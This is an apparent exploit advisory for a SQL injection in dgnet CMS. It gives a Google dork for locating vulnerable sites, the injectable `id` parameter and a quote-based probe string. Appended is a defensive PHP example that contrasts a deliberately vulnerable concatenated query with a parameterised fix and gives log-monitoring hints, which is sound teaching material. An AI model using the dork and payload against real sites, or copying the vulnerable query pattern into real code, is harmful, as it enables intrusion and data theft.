|=============================================================|
|-------------------In The Name Of God------------------------|
|
| Exploit Title: dgnet cms SQL Injection
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.dgnet.it
|
| Google Dork : intext:"dgNet webDesign" & inurl:/.php?id=
|
| Tested on: Windows 10 ~~~> Google Chrome
|
| Vulnerable path: /*.php?id=[SQL Injection]
|
| Date: Wednesday - 2018 04 April
|==============================================|
| Description:
|
| If you need a bypass, you can use the string method, like this:
| id=1' order by 999-- -
|==============================================|
| Proof :
|
|
|=============================================================
| Discovered By : sir shahroukh
|=============================================================
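
For maintainers of affected pages, the pattern behind the `id` parameter issue described above is shown here beside its fix. This is an added example, not code from dgnet CMS or from the advisory author. The `offers` table, its columns and both function names are hypothetical, an in-memory SQLite database stands in for the site's real database, and PHP 8 with the PDO SQLite driver is assumed.

```php
<?php
// Added example, not dgnet CMS code. Table, columns and function names are
// hypothetical; the sample row is constructed.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE offers (id INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("INSERT INTO offers (id, title) VALUES (1, 'Constructed sample row')");

// Vulnerable pattern: the raw parameter is concatenated into the SQL text,
// so a quote in `id` closes the string literal and the rest is parsed as SQL.
function fetchOfferVulnerable(PDO $pdo, string $id): array|false
{
    $sql = "SELECT id, title FROM offers WHERE id = '" . $id . "'";
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened: accept only a positive integer, then bind it as a typed
// parameter so the value is never parsed as SQL.
function fetchOfferSafe(PDO $pdo, string $id): array|false
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return false; // caller should answer 400/404 and not echo a DB error
    }
    $stmt = $pdo->prepare('SELECT id, title FROM offers WHERE id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

$probe = "1' order by 999-- -"; // the string quoted in the advisory

try {
    fetchOfferVulnerable($pdo, $probe);
    echo "vulnerable: query ran\n";
} catch (PDOException $e) {
    // The ORDER BY clause reached the SQL parser: input was treated as SQL.
    echo "vulnerable: database error: ", $e->getMessage(), "\n";
}

// The same string is rejected by validation before any query is built.
var_dump(fetchOfferSafe($pdo, $probe));
// A well-formed id is looked up through the bound parameter.
var_dump(fetchOfferSafe($pdo, "1"));
```

A database error surfacing from the first call is also the signal to look for in server logs: ORDER BY errors on requests whose `id` value contains a quote.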